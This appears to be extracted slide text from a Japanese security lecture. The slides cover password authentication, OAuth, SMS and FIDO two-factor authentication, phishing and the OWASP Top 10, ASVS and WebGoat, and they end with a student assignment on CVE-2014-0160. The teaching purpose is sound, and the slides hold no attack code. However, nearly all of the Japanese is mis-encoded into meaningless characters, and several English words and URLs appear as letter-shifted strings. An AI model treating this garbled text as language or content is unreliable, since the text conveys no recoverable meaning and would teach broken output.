184. ͜͜·Ͱͷ࿩͕Α͘෼͔Βͳ͔ͬͨਓʹ΋ ͓͍֮͑ͯͯཉ͍͠ࣄ ౪ௌऀʹ৘ใ͕࿙Εͳ͍Α͏ʹਖ਼͘͠҉߸Λ࢖͏ͷ͸೉͍͠ ಛผͳཧ༝͕ͳ͍ݶΓTLSΛ࢖͓͏ TLSΛ࢖͏࣌͸ ࠓͰ͸҆શͰ͸ͳ͍ݹ͍ػೳΛ੾Ζ͏ NEW!

185. ຊ෺ͷϢʔβͱ ِ෺ͷϢʔβΛݟ෼͚Δ

186. ೝূ Alice Aliceͷ;ΓΛ͢Δ ѱҙ͋Δୈࡾऀ "MJDFͰ͢ "MJDFͰ͢ αʔό͕ຊ෺͔Ͳ͏͔Λ͔֬ΊΔ࣌ͱҧ͍ Ϣʔβ͸ূ໌ॻΛ͍࣋ͬͯͳ͍

187. ύεϫʔυೝূ ύεϫʔυ͸
     Ͱ͢ ݹ͔͘Βར༻͞Ε͍ͯΔϢʔβͷೝূํ๏ ຊ෺ͷ"MJDFͳΒ
     ύεϫʔυΛ஌͍ͬͯΔഺ ʜ Alice Aliceͷ;ΓΛ͢Δ ѱҙ͋Δୈࡾऀ

188. ύεϫʔυೝূͷ໰୊఺ ʜ๨Ε·ͨ͠ ͍ΖΜͳαʔϏεʹ͍ΖΜͳύεϫʔυΛઃఆ͍ͯͨ͠Β Ϣʔβ͸ύεϫʔυΛ๨ΕΔ ຊ෺ͷ"MJDFͳΒ
     ύεϫʔυΛ஌͍ͬͯΔഺ ʜ Alice Aliceͷ;ΓΛ͢Δ ѱҙ͋Δୈࡾऀ

189. ൿີͷ࣭໰ ͜ΕͰ͸ύεϫʔυΛΑΓ؆୯ʹ͍ͯ͠ΔΑ͏ͳ΋ͷͰ͋Δ ޷͖ͳ৯΂෺͸
     ͳΜͰ͔͢ Alice Aliceͷ;ΓΛ͢Δ ѱҙ͋Δୈࡾऀ ਖ਼ղ
     ύεϫʔυΛઃఆ͠௚͍ͯͩ͘͠͞

190. OAuthೝূ ଟ͘ͷϢʔβ͸ Googleɺfacebook౳ͷ ΞΧ΢ϯτΛ͍࣋ͬͯΔ αʔϏε͸ ࣗ෼͕ͲΜͳ৘ใΛ ඞཁͱ͍ͯ͠Δ͔Λొ࿥͢Δ Ϣʔβ͸ͨ͘͞ΜͷαʔϏεΛར༻͍ͯ͠Δ ͦΕΒʹݸผʹύεϫʔυΛઃఆ͍ͯͨ͠Β ύεϫʔυΛ๨Εͯ͠·͏ͷ͸౰વͰ͋Δ

191. OAuthೝূ ͋ͷαʔϏε ͋ͷαʔϏεʹ ϩάΠϯ͍ͨ͠ ͋ͷαʔϏεʹ ͜Ε͚ͩͷ৘ใΛ౉͚͢ͲOK? OK ͋ͷαʔϏεʹ ϦΫΤεττʔΫϯ***Λ ౉͍ͯͩ͘͠͞

192. OAuthೝূ ͋ͷαʔϏε ϦΫΤεττʔΫϯ*** Ͱ͢ ϦΫΤεττʔΫϯ*** ͱ͔͍͏ͷ͕དྷͨΜ͚ͩͲ ͦͷਓ͸͏ͪͷAlice͞ΜͳͷͰ ௨͍ͯ͋͛ͯͩ͘͠͞ Alice͞ΜͷৄࡉΛ஌Γ͍ͨ৔߹͸ ΞΫηετʔΫϯ???Λ࢖͍ͬͯͩ͘͞

193. ͜͜ʹ
     χίχίಈըͷ
     ϩάΠϯը໘ΛషΔ Ϣʔβ͸ීஈ࢖͍ͬͯΔSNS౳ʹ ϩάΠϯ͢Ε͹αʔϏεΛར༻Ͱ͖Δ αʔϏεຖʹ ύεϫʔυΛ֮͑Δඞཁ΋ αʔϏεຖʹύεϫʔυΛೖྗ͢Δඞཁ΋ͳ͍ αʔϏεఏڙऀ͸ ۩ମతͳϢʔβೝূΛ

     ΑͦͷαʔϏεʹؙ౤͛Ͱ͖Δ ͜͏͍͏ͷ OAuthೝূ OAuthೝূΛ׆༻͍ͯ͠ΔαʔϏεͷྫ χίχίಈը https://account.nicovideo.jp/login

194. 2ཁૉೝূ Ϣʔβ͕ຊ෺Ͱ͋Δ͜ͱΛ֬ೝ͢Δखஈ͸3ͭʹ෼ྨͰ͖Δ 1.Ϣʔβ͸ԿΛ஌͍ͬͯΔ͔ ύεϫʔυೝূ౳ 2.Ϣʔβ͸ԿͰ͋Δ͔ ࢦ໲ೝূ౳ 3.Ϣʔβ͸ԿΛ͍࣋ͬͯΔ͔ ਎෼ূͷఏࣔ౳ 1Ҏ֎͸ಛผͳ૷ஔΛཁ͢Δҝ ैདྷଟ͘ͷΠϯλʔωοτ্ͷαʔϏε͸1͚ͩΛ࢖͖ͬͯͨ

195. ϑΟογϯά ຊ෺ͷαʔϏε ِ෺ͷαʔϏε ύεϫʔυ͸
     Ͱ͢ ύεϫʔυ͸
     Ͱ͢ ύεϫʔυ͸
     Ͱ͢ Ϣʔβ͕ԿΛ஌͍ͬͯΔ͔͸

     ϑΟογϯάʹର͢Δ଱ੑ͕ͳ͍

196. 2ཁૉೝূ Ϣʔβ͕ຊ෺Ͱ͋Δ͜ͱΛ֬ೝ͢Δखஈ͸3ͭʹ෼ྨͰ͖Δ 1.Ϣʔβ͸ԿΛ஌͍ͬͯΔ͔ ύεϫʔυೝূ౳ 2.Ϣʔβ͸ԿͰ͋Δ͔ ࢦ໲ೝূ౳ 3.Ϣʔβ͸ԿΛ͍࣋ͬͯΔ͔ ਎෼ূͷఏࣔ౳ 2ͱ3ͷ͍ͣΕ͔Λซ༻ͯ͠ͳΓ͢·͠Λ๷͙ඞཁ͕͋Δ

197. SMSΛར༻ͨ͠2ཁૉೝূ 3.Ϣʔβ͸ԿΛ͍࣋ͬͯΔ͔ Ϣʔβ͸ొ࿥͞Ε͍ͯΔܞଳి࿩Λ͍࣋ͬͯΔ͔ ύεϫʔυ͸
     Ͱ͢ 4.4ʹૹͬͨ൪߸Λ
     ೖྗ͍ͯͩ͘͠͞ 
     
     
      
     
     
      ϩάΠϯ੒ޭ

198. SMSΛར༻ͨ͠2ཁૉೝূͷ໰୊఺ ύεϫʔυ͸
     Ͱ͢ 
     
     
      ѱҙ͋Δୈࡾऀ͕SMSΛ೷͖ݟͰ͖ͨΒ ೝূΛಥഁ͞ΕΔ ͦ΋ͦ΋൪߸ೖྗ͢Δͷ ΊΜͲ͍͘͞ ΋ͬͱ҆શ͔ͭखܰʹ 2ཁૉೝূ͢ΔͨΊͷಓ۩͸

     ࡞Εͳ͍ͩΖ͏͔

199. FIDO U2F https://www.yubico.com/products/yubikey-hardware/ Ϣʔβ͕͔֬ʹ͜ͷUSBσόΠεΛ͍࣋ͬͯΔࣄΛ ެ։伴҉߸Λ࢖ͬͯূ໌͢Δ૷ஔ ͜͜ʹ
     ࣮ࡍʹചΒΕ͍ͯΔ'*%0
     6'ͷσόΠεͷը૾ΛషΔ

200. FIDO U2FͰϢʔβొ࿥ Ϣʔβొ࿥ AppIDΛఴ͑ͯ伴ੜ੒Λཁٻ "QQ*%ʹରԠ͢Δ
     ൿີ伴ͱެ։伴Λ࡞Δ ެ։伴ͱೝূثূ໌ॻͱ ೝূثূ໌ॻͰ࡞ͬͨॺ໊Λฦ͢ ॺ໊Λ࢖ͬͯ
     ৴པͰ͖ΔೝূثͰ͋ΔࣄΛ֬ೝ

     ެ։伴Λอଘ ొ࿥׬ྃ

201. FIDO U2FͰϩάΠϯ ύεϫʔυೝূ "QQ*%ʹରԠ͢Δ
     ൿີ伴ͰDIBMMFOHFΛ҉߸Խ ҉߸Խͨ͠challengeΛฦ͢ อଘͯ͋͠Δެ։伴Ͱ
     DIBMMFOHFΛ෮߸Ͱ͖ΔࣄΛ֬ೝ ೝূ׬ྃ ύεϫʔυΛ֬ೝ

     AppIDͱchallengeΛૹ৴

202. FIDO UAF ͦ΋ͦ΋ύεϫʔυΛೖྗ͢Δͷ͕ΊΜͲ͍͘͞ 1.Ϣʔβ͸ԿΛ஌͍ͬͯΔ͔ ύεϫʔυೝূ౳ 2.Ϣʔβ͸ԿͰ͋Δ͔ ࢦ໲ೝূ౳ 3.Ϣʔβ͸ԿΛ͍࣋ͬͯΔ͔ ਎෼ূͷఏࣔ౳ 1Λ࢖Θͣʹ2ͱ3Ͱ2ཁૉೝূ͠Α͏

203. FIDO UAF ੜମೝূ͕ඞཁʹͳΔͨΊෳࡶͳϋʔυ΢ΣΞ͕ඞཁʹͳΔ͕ Xperia XZ1͕FIDO UAF 1.1ʹ४ڌͨ͠ॳͷσόΠεʹͳͬͨࣄΛใ͡Δهࣄ https://fidoalliance.org/first-fido-uaf-1-1-implementations-ease-deployment- advanced-biometric-authentication-android-devices/ αʔϏε͕FIDO

     UAFʹରԠ͢Δ͜ͱͰ ͜͏ͨ͠σόΠεͷϢʔβʹύεϫʔυෆཁͷೝূΛఏڙͰ͖Δ ͜͜ʹ
     9QFSJB
     9;͕'*%0
     6"'ʹ४ڌͨ͜͠ͱΛใ͡ΔهࣄΛషΔ

204. Webϖʔδʹର͢Δ ߈ܸʹඋ͑Δ

205. OWASP https://www.owasp.org/ ҆શͳWebΞϓϦέʔγϣϯͷҝͷ৘ใͷڞ༗΍ܒൃΛߦ͏ ΦʔϓϯίϛϡχςΟ ͜͜ʹ
     08"41ͷτοϓϖʔδΛషΔ

206. OWASP Top 10 WebΞϓϦέʔγϣϯ։ൃऀ΁ͷ஫ҙשىΛ໨తͱͯ͠ WebΞϓϦέʔγϣϯͷ୅දతͳ੬ऑੑΛ10छྨબΜͩ΋ͷ https://www.owasp.org/images/2/23/OWASP_Top_10-2017%28ja%29.pdf ࠷৽൛͸OWASP Top 10 2017Ͱ೔ຊޠ༁΋ଘࡏ͢Δ

     ͜͜ʹ
     08"41
     5PQͷදࢴΛషΔ

207. OWASP Top 10 ΠϯδΣΫγϣϯ ೝূͷෆඋ ػඍͳ৘ใͷ࿐ग़ 9.-
     ֎෦Τϯ
     ςΟςΟࢀর ΞΫηε੍ޚͷෆඋ ෆద੾ͳηΩϡϦςΟઃఆ ΫϩεαΠτεΫϦϓςΟϯά

     ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ ط஌ͷ੬ऑੑͷ͋Δίϯϙʔωϯτͷ࢖༻ ෆे෼ͳϩΪϯάͱϞχλϦϯά

208. ͜͜ʹ
     08"41
     5PQͷΠϯδΣΫγϣϯͷղઆΛషΔ OWASP Top 10 https://www.owasp.org/images/2/23/ OWASP_Top_10-2017%28ja%29.pdf ੬ऑੑͷछྨຖʹ ͲͷΑ͏ʹൃݟ͢Ε͹ྑ͍͔ ͲͷΑ͏ʹ๷ࢭ͢Ε͹ྑ͍͔

     ͕వΊΒΕ͍ͯΔ ΠϯδΣΫγϣϯʹର͢Δ๷ࢭํ๏ ΠϯλϓϦλ͔ΒΫΤϦΛ౤͛ͳ͍ ύϥϝʔλԽ͞ΕͨΠϯλʔϑΣʔε ·ͨ͸ORMΛ࢖͏ ಡ΋͏

209. ͜͜ʹ
     08"41
     "474ͷදࢴΛషΔ OWASP Application Security Verification Standard WebΞϓϦέʔγϣϯͷ҆શੑΛݕূ͢ΔͨΊʹ νΣοΫ͢΂͖߲໨Λ·ͱΊͨ΋ͷ ࠷৽൛͸OWASP

     ASVS 3.0.1Ͱ೔ຊޠ༁΋ଘࡏ͢Δ IUUQTXXXKQDFSUPSKQTFDVSFDPEJOHNBUFSJBMTPXBTQBTWTIUNM

210. ͜͜ʹ
     08"41
     "474ͷνΣοΫ߲໨ͷҰ෦ΛషΔ OWASP Application Security Verification Standard IUUQTXXXKQDFSUPSKQTFDVSFDPEJOH NBUFSJBMTPXBTQBTWTIUNM ͋ΒΏΔΞϓϦέʔγϣϯ͕ຬͨ͢΂͖Ϩϕϧ1

     ݸਓ৘ใ΍վ͟Μ͞ΕΔͱࠔΔ৘ใΛѻ͏ ΞϓϦέʔγϣϯ͕ຬͨ͢΂͖Ϩϕϧ2 ো֐ͷൃੜ͕૊৫ͷଘଓ΍ਓ໋ʹؔΘΔ ΞϓϦέʔγϣϯ͕ຬͨ͢΂͖Ϩϕϧ3 Ϩϕϧ্͕͕Δ΄ͲνΣοΫ߲໨͕૿͑Δ ύεϫʔυมߋػೳʹ ݹ͍ύεϫʔυͷೖྗ ৽͍͠ύεϫʔυͷೖྗ ৽͍͠ύεϫʔυͷ֬ೝ ͷ3ͭΛཁٻ͍ͯ͠Δ͔Ͳ͏͔ΛνΣοΫ WebΞϓϦέʔγϣϯΛ࡞ͬͨΒ νΣοΫ͠Α͏

211. ͜͜ʹ
     08"41
     8FC(PBUͷը૾ΛషΔ OWASP WebGoat https://github.com/WebGoat/WebGoat JavaͰॻ͔ΕͨWebΞϓϦέʔγϣϯ ҙਤతʹ༷ʑͳ੬ऑੑ͕࢓ࠐ·Ε͍ͯΔ ੬ऑੑΛ࣮ફతʹֶͼ͍ͨ ࣗ෼ͷߦͳ͍ͬͯΔ੬ऑੑͷνΣοΫ͕ ਖ਼͍͔͔֬͠Ί͍ͨ

     ͦ͏͍͏࣌ʹ࢖͑Δ

212. ࠷ޙʹ

213. ͋ΒΏΔιϑτ΢ΣΞηΩϡϦςΟ͸ ෺ཧతͳηΩϡϦςΟΛલఏͱ͍ͯ͠Δ ѱҙ͋Δୈࡾऀ͕αʔόϧʔϜʹ৵ೖͯ͠ిݯέʔϒϧΛൈ͘͜ͱͰ αʔϏεΛఀࢭͤ͞Δ͜ͱ͕Ͱ͖Δ੬ऑੑ ·ͣށకΓ ιϑτ΢ΣΞηΩϡϦςΟ͸ͦΕ͔Βͩ ͜ͷΑ͏ͳ߈ܸʹରͯ͠ιϑτ΢ΣΞ͸جຊతʹଧͭख͕ͳ͍

214. ՝୊ CVE-2014-0160 ͜ͷ੬ऑੑ͕Ͳ͏͍͏࣌ʹԿ͕ى͜Δ΋ͷͰ ͦͷ݁ՌͲͷΑ͏ͳѱӨڹ͕༧૝͞ΕΔ͔Λઆ໌͍ͯͩ͘͠͞ ͜ͷ੬ऑੑΛճආ͢ΔͨΊʹͱΓ͏ΔରԠΛ1ͭҎ্ड़΂͍ͯͩ͘͞